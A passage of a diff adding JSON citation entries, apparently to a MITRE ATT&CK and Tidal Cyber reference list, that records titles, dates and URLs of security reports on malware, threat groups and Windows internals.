"Cybereason WhisperGate February 2022" + }, + { + "description": "Insikt Group. (2020, January 28). WhisperGate Malware Corrupts Computers in Ukraine. Retrieved March 31, 2023.", + "meta": { + "date_accessed": "2023-03-31T00:00:00Z", + "date_published": "2020-01-28T00:00:00Z", + "refs": [ + "https://www.recordedfuture.com/whispergate-malware-corrupts-computers-ukraine" + ], + "source": "MITRE", + "title": "WhisperGate Malware Corrupts Computers in Ukraine" + }, + "related": [], + "uuid": "4610e4db-a75b-5fdd-826d-15099d131585", + "value": "RecordedFuture WhisperGate Jan 2022" + }, + { + "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020.", + "meta": { + "date_accessed": "2020-05-26T00:00:00Z", + "date_published": "2019-03-06T00:00:00Z", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore" + ], + "source": "MITRE, Tidal Cyber", + "title": "Whitefly: Espionage Group has Singapore in Its Sights" + }, + "related": [], + "uuid": "d0e48356-36d9-4b4c-b621-e3c4404378d2", + "value": "Symantec Whitefly March 2019" + }, + { + "description": "Accenture. (2021, November 9). Who are latest targets of cyber group Lyceum?. Retrieved June 16, 2022.", + "meta": { + "date_accessed": "2022-06-16T00:00:00Z", + "date_published": "2021-11-09T00:00:00Z", + "refs": [ + "https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns" + ], + "source": "MITRE", + "title": "Who are latest targets of cyber group Lyceum?" + }, + "related": [], + "uuid": "127836ce-e459-405d-a75c-32fd5f0ab198", + "value": "Accenture Lyceum Targets November 2021" + }, + { + "description": "Brian Krebs. (2017, January 18). Who is Anna-Senpai, the Mirai Worm Author?. Retrieved May 15, 2017.", + "meta": { + "date_accessed": "2017-05-15T00:00:00Z", + "date_published": "2017-01-18T00:00:00Z", + "refs": [ + "https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/" + ], + "source": "MITRE", + "title": "Who is Anna-Senpai, the Mirai Worm Author?" + }, + "related": [], + "uuid": "028b7582-be46-4642-9e36-b781cac66340", + "value": "Krebs-Anna" + }, + { + "description": "CrowdStrike. (2022, March 30). Who is EMBER BEAR?. Retrieved June 9, 2022.", + "meta": { + "date_accessed": "2022-06-09T00:00:00Z", + "date_published": "2022-03-30T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/who-is-ember-bear/" + ], + "source": "MITRE", + "title": "Who is EMBER BEAR?" + }, + "related": [], + "uuid": "0639c340-b495-4d91-8418-3069f3fe0df1", + "value": "CrowdStrike Ember Bear Profile March 2022" + }, + { + "description": "NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "refs": [ + "https://www.whois.net/" + ], + "source": "MITRE", + "title": "Whois Lookup" + }, + "related": [], + "uuid": "fa6cba30-66e9-4a6b-85e8-a8c3773a3efe", + "value": "WHOIS" + }, + { + "description": "Meyers, A. (2013, March 29). Whois Numbered Panda. Retrieved January 14, 2016.", + "meta": { + "date_accessed": "2016-01-14T00:00:00Z", + "date_published": "2013-03-29T00:00:00Z", + "refs": [ + "http://www.crowdstrike.com/blog/whois-numbered-panda/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Whois Numbered Panda" + }, + "related": [], + "uuid": "988dfcfc-0c16-4129-9523-a77539291951", + "value": "Meyers Numbered Panda" + }, + { + "description": "Orleans, A. (2020, August 31). Who Is PIONEER KITTEN?. Retrieved December 21, 2020.", + "meta": { + "date_accessed": "2020-12-21T00:00:00Z", + "date_published": "2020-08-31T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/who-is-pioneer-kitten/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Who Is PIONEER KITTEN?" + }, + "related": [], + "uuid": "4fce29cc-ddab-4b96-b295-83c282a87564", + "value": "CrowdStrike PIONEER KITTEN August 2020" + }, + { + "description": "Baumgartner, K., Guerrero-Saade, J. (2015, March 4). Who’s Really Spreading through the Bright Star?. Retrieved December 18, 2020.", + "meta": { + "date_accessed": "2020-12-18T00:00:00Z", + "date_published": "2015-03-04T00:00:00Z", + "refs": [ + "https://securelist.com/whos-really-spreading-through-the-bright-star/68978/" + ], + "source": "MITRE", + "title": "Who’s Really Spreading through the Bright Star?" + }, + "related": [], + "uuid": "59cba16f-91ed-458c-91c9-5b02c03678f5", + "value": "SECURELIST Bright Star 2015" + }, + { + "description": "Fiser, D., Oliveira, A.. (2019, December 20). Why a Privileged Container in Docker is a Bad Idea. Retrieved March 30, 2021.", + "meta": { + "date_accessed": "2021-03-30T00:00:00Z", + "date_published": "2019-12-20T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html" + ], + "source": "MITRE", + "title": "Why a Privileged Container in Docker is a Bad Idea" + }, + "related": [], + "uuid": "92ac290c-4863-4774-b334-848ed72e3627", + "value": "Trend Micro Privileged Container" + }, + { + "description": "Mandiant Intelligence. (2023, September 14). Why Are You Texting Me? UNC3944 Leverages SMS Phishing Campaigns for SIM Swapping, Ransomware, Extortion, and Notoriety. Retrieved November 16, 2023.", + "meta": { + "date_accessed": "2023-11-16T00:00:00Z", + "date_published": "2023-09-14T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.mandiant.com/resources/blog/unc3944-sms-phishing-sim-swapping-ransomware" + ], + "source": "Tidal Cyber", + "title": "Why Are You Texting Me? UNC3944 Leverages SMS Phishing Campaigns for SIM Swapping, Ransomware, Extortion, and Notoriety" + }, + "related": [], + "uuid": "7420d79f-c6a3-4932-9c2e-c9cc36e2ca35", + "value": "Mandiant UNC3944 September 14 2023" + }, + { + "description": "Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.", + "meta": { + "date_accessed": "2019-09-12T00:00:00Z", + "refs": [ + "https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/" + ], + "source": "MITRE", + "title": "Why You Should Always Use Access Tokens to Secure APIs" + }, + "related": [], + "uuid": "8ec52402-7e54-463d-8906-f373e5855018", + "value": "Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019" + }, + { + "description": "Ladikov, A. (2015, January 29). Why You Shouldn’t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016.", + "meta": { + "date_accessed": "2016-03-31T00:00:00Z", + "date_published": "2015-01-29T00:00:00Z", + "refs": [ + "https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/" + ], + "source": "MITRE", + "title": "Why You Shouldn’t Completely Trust Files Signed with Digital Certificates" + }, + "related": [], + "uuid": "3568163b-24b8-42fd-b111-b9d83c34cc4f", + "value": "Securelist Digital Certificates" + }, + { + "description": "Matt Dahl. (2019, January 25). Widespread DNS Hijacking Activity Targets Multiple Sectors. Retrieved February 14, 2022.", + "meta": { + "date_accessed": "2022-02-14T00:00:00Z", + "date_published": "2019-01-25T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/" + ], + "source": "MITRE", + "title": "Widespread DNS Hijacking Activity Targets Multiple Sectors" + }, + "related": [], + "uuid": "969ad6de-9415-464d-ba52-2e61e1814a92", + "value": "Crowdstrike DNS Hijack 2019" + }, + { + "description": "Geeks for Geeks. (n.d.). Wi-Fi Password of All Connected Networks in Windows/Linux. Retrieved September 8, 2023.", + "meta": { + "date_accessed": "2023-09-08T00:00:00Z", + "refs": [ + "https://www.geeksforgeeks.org/wi-fi-password-connected-networks-windowslinux/" + ], + "source": "MITRE", + "title": "Wi-Fi Password of All Connected Networks in Windows/Linux" + }, + "related": [], + "uuid": "7005f62f-0239-56c7-964b-64384e17b8da", + "value": "Wi-Fi Password of All Connected Networks in Windows/Linux" + }, + { + "description": "Executable compression. (n.d.). Retrieved December 4, 2014.", + "meta": { + "date_accessed": "2014-12-04T00:00:00Z", + "refs": [ + "http://en.wikipedia.org/wiki/Executable_compression" + ], + "source": "MITRE", + "title": "Wikipedia Exe Compression" + }, + "related": [], + "uuid": "13ac05f8-f2a9-4243-8039-aff9ee1d5fc6", + "value": "Wikipedia Exe Compression" + }, + { + "description": "Matrosov, A., Rodionov, E., Volkov, D., Harley, D. (2012, March 2). Win32/Carberp When You’re in a Black Hole, Stop Digging. Retrieved July 15, 2020.", + "meta": { + "date_accessed": "2020-07-15T00:00:00Z", + "date_published": "2012-03-02T00:00:00Z", + "refs": [ + "https://www.eset.com/fileadmin/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf" + ], + "source": "MITRE", + "title": "Win32/Carberp When You’re in a Black Hole, Stop Digging" + }, + "related": [], + "uuid": "806eadfc-f473-4f2b-b03b-8a1f1c0a2d96", + "value": "ESET Carberp March 2012" + }, + { + "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.", + "meta": { + "date_accessed": "2020-12-18T00:00:00Z", + "date_published": "2017-06-12T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + ], + "source": "MITRE", + "title": "Win32/Industroyer: A new threat for industrial controls systems" + }, + "related": [], + "uuid": "9197f712-3c53-4746-9722-30e248511611", + "value": "ESET Industroyer" + }, + { + "description": "Manuel, J. and Plantado, R.. (2015, August 9). Win32/Kasidet. Retrieved March 24, 2016.", + "meta": { + "date_accessed": "2016-03-24T00:00:00Z", + "date_published": "2015-08-09T00:00:00Z", + "refs": [ + "http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32%2FKasidet" + ], + "source": "MITRE", + "title": "Win32/Kasidet" + }, + "related": [], + "uuid": "7c34c189-6581-4a56-aead-871400839d1a", + "value": "Microsoft Kasidet" + }, + { + "description": "Vachon, F. (2017, October 30). Windigo Still not Windigone: An Ebury Update . Retrieved February 10, 2021.", + "meta": { + "date_accessed": "2021-02-10T00:00:00Z", + "date_published": "2017-10-30T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/" + ], + "source": "MITRE", + "title": "Windigo Still not Windigone: An Ebury Update" + }, + "related": [], + "uuid": "5257a8ed-1cc8-42f8-86a7-8c0fd0e553a7", + "value": "ESET Ebury Oct 2017" + }, + { + "description": "Microsoft. (2015, June 9). Windows 10 to offer application developers new malware defenses. Retrieved February 12, 2018.", + "meta": { + "date_accessed": "2018-02-12T00:00:00Z", + "date_published": "2015-06-09T00:00:00Z", + "refs": [ + "https://cloudblogs.microsoft.com/microsoftsecure/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/?source=mmpc" + ], + "source": "MITRE", + "title": "Windows 10 to offer application developers new malware defenses" + }, + "related": [], + "uuid": "d3724d08-f89b-4fb9-a0ea-3a6f929e0b6a", + "value": "Microsoft AMSI June 2015" + }, + { + "description": "Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "refs": [ + "http://www.pretentiousname.com/misc/win7_uac_whitelist2.html" + ], + "source": "MITRE", + "title": "Windows 7 UAC whitelist" + }, + "related": [], + "uuid": "49af01f2-06c5-4b21-9882-901ad828ee28", + "value": "Davidson Windows" + }, + { + "description": "spotheplanet. (n.d.). Windows API Hashing in Malware. Retrieved August 22, 2022.", + "meta": { + "date_accessed": "2022-08-22T00:00:00Z", + "refs": [ + "https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware" + ], + "source": "MITRE", + "title": "Windows API Hashing in Malware" + }, + "related": [], + "uuid": "1b8b87d5-1b70-401b-8850-d8afd3b22356", + "value": "IRED API Hashing" + }, + { + "description": "Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads Info Stealer and Adware. Retrieved April 25, 2019.", + "meta": { + "date_accessed": "2019-04-25T00:00:00Z", + "date_published": "2019-02-11T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/" + ], + "source": "MITRE", + "title": "Windows App Runs on Mac, Downloads Info Stealer and Adware" + }, + "related": [], + "uuid": "dc673650-1a37-4af1-aa03-8f57a064156b", + "value": "TrendMicro WindowsAppMac" + }, + { + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "meta": { + "date_accessed": "2016-02-02T00:00:00Z", + "date_published": "2016-01-26T00:00:00Z", + "refs": [ + "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html" + ], + "source": "MITRE", + "title": "Windows Commands Abused by Attackers" + }, + "related": [], + "uuid": "9d935f7f-bc2a-4d09-a51a-82074ffd7d77", + "value": "Windows Commands JPCERT" + }, + { + "description": "Amplia Security. (n.d.). Windows Credentials Editor (WCE) F.A.Q.. Retrieved December 17, 2015.", + "meta": { + "date_accessed": "2015-12-17T00:00:00Z", + "refs": [ + "http://www.ampliasecurity.com/research/wcefaq.html" + ], + "source": "MITRE", + "title": "Windows Credentials Editor (WCE) F.A.Q." + }, + "related": [], + "uuid": "790ea33a-7a64-488e-ab90-d82e021e0c06", + "value": "Amplia WCE" + }, + { + "description": "Gorzelany, A., Hall, J., Poggemeyer, L.. (2019, January 7). Windows Defender Application Control. Retrieved July 16, 2019.", + "meta": { + "date_accessed": "2019-07-16T00:00:00Z", + "date_published": "2019-01-07T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/windows-defender-application-control" + ], + "source": "MITRE", + "title": "Windows Defender Application Control" + }, + "related": [], + "uuid": "678ef307-d203-4b65-bed4-b844ada7ab83", + "value": "Microsoft Windows Defender Application Control" + }, + { + "description": "Florio, E.. (2017, May 4). Windows Defender ATP thwarts Operation WilySupply software supply chain cyberattack. Retrieved February 14, 2019.", + "meta": { + "date_accessed": "2019-02-14T00:00:00Z", + "date_published": "2017-05-04T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/" + ], + "source": "MITRE", + "title": "Windows Defender ATP thwarts Operation WilySupply software supply chain cyberattack" + }, + "related": [], + "uuid": "567ce633-a061-460b-84af-01dfe3d818c7", + "value": "Microsoft Operation Wilysupply" + }, + { + "description": "Eli Collins. (2016, November 25). Windows' Domain Cached Credentials v2. Retrieved February 21, 2020.", + "meta": { + "date_accessed": "2020-02-21T00:00:00Z", + "date_published": "2016-11-25T00:00:00Z", + "refs": [ + "https://passlib.readthedocs.io/en/stable/lib/passlib.hash.msdcc2.html" + ], + "source": "MITRE", + "title": "Windows' Domain Cached Credentials v2" + }, + "related": [], + "uuid": "ce40e997-d04b-49a6-8838-13205c54243a", + "value": "PassLib mscache" + }, + { + "description": "Forshaw, J. (2018, April 18). Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege. Retrieved May 3, 2018.", + "meta": { + "date_accessed": "2018-05-03T00:00:00Z", + "date_published": "2018-04-18T00:00:00Z", + "refs": [ + "https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html" + ], + "source": "MITRE", + "title": "Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege" + }, + "related": [], + "uuid": "2c49288b-438d-487a-8e6e-f9d9eda73e2f", + "value": "ProjectZero File Write EoP Apr 2018" + }, + { + "description": "JinQuan, MaDongZe, TuXiaoYi, and LiHao. (2021, February 10). Windows kernel zero-day exploit (CVE-2021-1732) is used by BITTER APT in targeted attack. Retrieved June 1, 2022.", + "meta": { + "date_accessed": "2022-06-01T00:00:00Z", + "date_published": "2021-02-10T00:00:00Z", + "refs": [ + "https://ti.dbappsecurity.com.cn/blog/articles/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/" + ], + "source": "MITRE", + "title": "Windows kernel zero-day exploit (CVE-2021-1732) is used by BITTER APT in targeted attack" + }, + "related": [], + "uuid": "fb98df9a-303d-4658-93da-0dcbd7bf9b1e", + "value": "DBAPPSecurity BITTER zero-day Feb 2021" + }, + { + "description": "Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense against user-land. Retrieved December 12, 2017.", + "meta": { + "date_accessed": "2017-12-12T00:00:00Z", + "date_published": "2017-06-27T00:00:00Z", + "refs": [ + "https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/" + ], + "source": "MITRE", + "title": "Windows Keylogger Part 2: Defense against user-land" + }, + "related": [], + "uuid": "d2d2186c-040f-4045-b161-fc468aa09534", + "value": "EyeofRa Detecting Hooking June 2017" + }, + { + "description": "Passcape. (n.d.). Windows LSA secrets. Retrieved February 21, 2020.", + "meta": { + "date_accessed": "2020-02-21T00:00:00Z", + "refs": [ + "https://www.passcape.com/index.php?section=docsys&cmd=details&id=23" + ], + "source": "MITRE", + "title": "Windows LSA secrets" + }, + "related": [], + "uuid": "64b0e13f-de5f-4964-bcfa-bb0f6206383a", + "value": "Passcape LSA Secrets" + }, + { + "description": "Lucian Constantin. (2014, January 23). Windows malware tries to infect Android devices connected to PCs. Retrieved May 25, 2022.", + "meta": { + "date_accessed": "2022-05-25T00:00:00Z", + "date_published": "2014-01-23T00:00:00Z", + "refs": [ + "https://www.computerworld.com/article/2486903/windows-malware-tries-to-infect-android-devices-connected-to-pcs.html" + ], + "source": "MITRE", + "title": "Windows malware tries to infect Android devices connected to PCs" + }, + "related": [], + "uuid": "3733386a-14bd-44a6-8241-a10660ba25d9", + "value": "Windows Malware Infecting Android" + }, + { + "description": "Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.", + "meta": { + "date_accessed": "2016-04-27T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/en-us/library/aa394582.aspx" + ], + "source": "MITRE", + "title": "Windows Management Instrumentation" + }, + "related": [], + "uuid": "210ca539-71f6-4494-91ea-402a3e0e2a10", + "value": "MSDN WMI" + }, + { + "description": "Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.", + "meta": { + "date_accessed": "2016-03-30T00:00:00Z", + "date_published": "2015-01-01T00:00:00Z", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf" + ], + "source": "MITRE", + "title": "Windows Management Instrumentation (WMI) Offense, Defense, and Forensics" + }, + "related": [], + "uuid": "135ccd72-2714-4453-9c8f-f5fde31905ee", + "value": "FireEye WMI 2015" + }, + { + "description": "Brinkmann, M.. (2017, June 10). Windows .msc files overview. Retrieved September 20, 2021.", + "meta": { + "date_accessed": "2021-09-20T00:00:00Z", + "date_published": "2017-06-10T00:00:00Z", + "refs": [ + "https://www.ghacks.net/2017/06/10/windows-msc-files-overview/" + ], + "source": "MITRE", + "title": "Windows .msc files overview" + }, + "related": [], + "uuid": "81aa896a-3498-4c37-8882-2b77933b71a8", + "value": "win_msc_files_overview" + }, + { + "description": "Hill, T. (n.d.). Windows NT Command Shell. Retrieved December 5, 2014.", + "meta": { + "date_accessed": "2014-12-05T00:00:00Z", + "refs": [ + "http://technet.microsoft.com/en-us/library/cc723564.aspx#XSLTsection127121120120" + ], + "source": "MITRE", + "title": "Windows NT Command Shell" + }, + "related": [], + "uuid": "0e5dfc7e-c908-49b4-a54f-7dcecf332ee8", + "value": "Hill NT Shell" + }, + { + "description": "Passcape. (n.d.). Windows Password Recovery - Vault Explorer and Decoder. Retrieved November 24, 2020.", + "meta": { + "date_accessed": "2020-11-24T00:00:00Z", + "refs": [ + "https://www.passcape.com/windows_password_recovery_vault_explorer" + ], + "source": "MITRE", + "title": "Windows Password Recovery - Vault Explorer and Decoder" + }, + "related": [], + "uuid": "a8a56a64-8e73-4331-9961-b1f9b6cbb348", + "value": "passcape Windows Vault" + }, + { + "description": "Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016.", + "meta": { + "date_accessed": "2016-06-24T00:00:00Z", + "date_published": "2016-06-01T00:00:00Z", + "refs": [ + "http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf" + ], + "source": "MITRE", + "title": "WINDOWS POWERSHELL LOGGING CHEAT SHEET - Win 7/Win 2008 or later" + }, + "related": [], + "uuid": "d7da4285-aeed-42dc-8f55-facbe6daf317", + "value": "Malware Archaeology PowerShell Cheat Sheet" + }, + { + "description": "Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016.", + "meta": { + "date_accessed": "2016-04-28T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx" + ], + "source": "MITRE", + "title": "Windows PowerShell Scripting" + }, + "related": [], + "uuid": "20ec94d1-4a5c-43f5-bb65-f3ea965d2b6e", + "value": "TechNet PowerShell" + }, + { + "description": "absolomb. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018.", + "meta": { + "date_accessed": "2018-08-10T00:00:00Z", + "date_published": "2018-01-26T00:00:00Z", + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/" + ], + "source": "MITRE", + "title": "Windows Privilege Escalation Guide" + }, + "related": [], + "uuid": "185154f2-5f2e-48bf-b609-991e9d6a037b", + "value": "Windows Privilege Escalation Guide" + }, + { + "description": "McFarland, R. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018.", + "meta": { + "date_accessed": "2018-08-10T00:00:00Z", + "date_published": "2018-01-26T00:00:00Z", + "refs": [ + "https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/" + ], + "source": "MITRE", + "title": "Windows Privilege Escalation Guide" + }, + "related": [], + "uuid": "c52945dc-eb20-4e69-8f8e-a262f33c244c", + "value": "SploitSpren Windows Priv Jan 2018" + }, + { + "description": "HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted Services. Retrieved August 10, 2018.", + "meta": { + "date_accessed": "2018-08-10T00:00:00Z", + "date_published": "2018-04-23T00:00:00Z", + "refs": [ + "https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/" + ], + "source": "MITRE", + "title": "Windows Privilege Escalation – Unquoted Services" + }, + "related": [], + "uuid": "939c05ae-bb21-4ed2-8fa3-a729f717ee3a", + "value": "SecurityBoulevard Unquoted Services APR 2018" + }, + { + "description": "HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted Services. Retrieved August 10, 2018.", + "meta": { + "date_accessed": "2018-08-10T00:00:00Z", + "date_published": "2018-04-23T00:00:00Z", + "refs": [ + "https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/" + ], + "source": "MITRE", + "title": "Windows Privilege Escalation – Unquoted Services" + }, + "related": [], + "uuid": "30681a0a-a49f-416a-b5bc-621c60f1130a", + "value": "Windows Unquoted Services" + }, + { + "description": "odzhan. (2019, May 25). Windows Process Injection: KernelCallbackTable used by FinFisher / FinSpy. Retrieved February 4, 2022.", + "meta": { + "date_accessed": "2022-02-04T00:00:00Z", + "date_published": "2019-05-25T00:00:00Z", + "refs": [ + "https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/" + ], + "source": "MITRE", + "title": "Windows Process Injection: KernelCallbackTable used by FinFisher / FinSpy" + }, + "related": [], + "uuid": "01a3fc64-ff07-48f7-b0d9-5728012761c7", + "value": "Windows Process Injection KernelCallbackTable" + }, + { + "description": "odzhan. (2019, April 25). Windows Process Injection: WordWarping, Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline. Retrieved November 15, 2021.", + "meta": { + "date_accessed": "2021-11-15T00:00:00Z", + "date_published": "2019-04-25T00:00:00Z", + "refs": [ + "https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/" + ], + "source": "MITRE", + "title": "Windows Process Injection: WordWarping, Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline" + }, + "related": [], + "uuid": "1bf45166-bfce-450e-87d1-b1e3b19fdb62", + "value": "Modexp Windows Process Injection" + }, + { + "description": "Wikipedia. (n.d.). Windows Registry. Retrieved February 2, 2015.", + "meta": { + "date_accessed": "2015-02-02T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Windows_Registry" + ], + "source": "MITRE", + "title": "Windows Registry" + }, + "related": [], + "uuid": "656f0ffd-33e0-40ef-bdf7-70758f855f18", + "value": "Wikipedia Windows Registry" + }, + { + "description": "Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.", + "meta": { + "date_accessed": "2018-04-11T00:00:00Z", + "date_published": "2013-09-24T00:00:00Z", + "refs": [ + "https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order" + ], + "source": "MITRE", + "title": "Windows Registry Persistence, Part 2: The Run Keys and Search-Order" + }, + "related": [], + "uuid": "9e9c745f-19fd-4218-b8dc-85df804ecb70", + "value": "Cylance Reg Persistence Sept 2013" + }, + { + "description": "Microsoft. (n.d.). Windows Remote Management. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "refs": [ + "http://msdn.microsoft.com/en-us/library/aa384426" + ], + "source": "MITRE", + "title": "Windows Remote Management" + }, + "related": [], + "uuid": "ddbe110c-88f1-4774-bcb9-cd18b6218fc4", + "value": "Microsoft WinRM" + }, + { + "description": "Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017.", + "meta": { + "date_accessed": "2017-12-21T00:00:00Z", + "refs": [ + "https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf" + ], + "source": "MITRE", + "title": "Windows Rootkit Overview" + }, + "related": [], + "uuid": "5b8d9094-dabf-4c29-a95b-b90dbcf07382", + "value": "Symantec Windows Rootkits" + }, + { + "description": "Clément Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021.", + "meta": { + "date_accessed": "2021-08-25T00:00:00Z", + "date_published": "2020-11-12T00:00:00Z", + "refs": [ + "https://itm4n.github.io/windows-registry-rpceptmapper-eop/" + ], + "source": "MITRE", + "title": "Windows RpcEptMapper Service Insecure Registry Permissions EoP" + }, + "related": [], + "uuid": "d18717ae-7fe4-40f9-aff2-b35120d31dc8", + "value": "insecure_reg_perms" + }, + { + "description": "Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved June 23, 2020.", + "meta": { + "date_accessed": "2020-06-23T00:00:00Z", + "date_published": "2017-01-18T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/scripting/winscript/windows-script-interfaces" + ], + "source": "MITRE", + "title": "Windows Script Interfaces" + }, + "related": [], + "uuid": "9e7cd4da-da18-4d20-809a-19abb4352807", + "value": "Microsoft Windows Scripts" + }, + { + "description": "Franklin Smith, R. (n.d.). Windows Security Log Event ID 4670. Retrieved November 4, 2019.", + "meta": { + "date_accessed": "2019-11-04T00:00:00Z", + "refs": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670" + ], + "source": "MITRE", + "title": "Windows Security Log Event ID 4670" + }, + "related": [], + "uuid": "23a50cd5-ac76-4dbe-8937-0fe8aec8cbf6", + "value": "Microsoft Security Event 4670" + }, + { + "description": "Franklin Smith. (n.d.). Windows Security Log Events. Retrieved February 21, 2020.", + "meta": { + "date_accessed": "2020-02-21T00:00:00Z", + "refs": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/" + ], + "source": "MITRE", + "title": "Windows Security Log Events" + }, + "related": [], + "uuid": "53464503-6e6f-45d8-a208-1820678deeac", + "value": "Windows Log Events" + }, + { + "description": "Naceri, A. (2021, November 7). Windows Server 2019 file overwrite bug. Retrieved April 7, 2022.", + "meta": { + "date_accessed": "2022-04-07T00:00:00Z", + "date_published": "2021-11-07T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20211107115646/https://twitter.com/klinix5/status/1457316029114327040" + ], + "source": "MITRE", + "title": "Windows Server 2019 file overwrite bug" + }, + "related": [], + "uuid": "158d971e-2f96-5200-8a87-d3887de30ff0", + "value": "winser19_file_overwrite_bug_twitter" + }, + { + "description": "Daniel Prizmant. (2020, July 15). Windows Server Containers Are Open, and Here's How You Can Break Out. Retrieved October 1, 2021.", + "meta": { + "date_accessed": "2021-10-01T00:00:00Z", + "date_published": "2020-07-15T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/" + ], + "source": "MITRE", + "title": "Windows Server Containers Are Open, and Here's How You Can Break Out" + }, + "related": [], + "uuid": "9a801256-5852-433e-95bd-768f9b70b9fe", + "value": "Windows Server Containers Are Open" + }, + { + "description": "Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls. Retrieved December 18, 2017.", + "meta": { + "date_accessed": "2017-12-18T00:00:00Z", + "date_published": "2007-10-24T00:00:00Z", + "refs": [ + "https://forum.sysinternals.com/appcertdlls_topic12546.html" + ], + "source": "MITRE", + "title": "Windows Sysinternals - AppCertDlls" + }, + "related": [], + "uuid": "68e006df-9fb6-4890-9952-7bad38b16dee", + "value": "Sysinternals AppCertDlls Oct 2007" + }, + { + "description": "Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11. Retrieved May 13, 2015.", + "meta": { + "date_accessed": "2015-05-13T00:00:00Z", + "date_published": "2014-05-02T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx" + ], + "source": "MITRE", + "title": "Windows Sysinternals PsExec v2.11" + }, + "related": [], + "uuid": 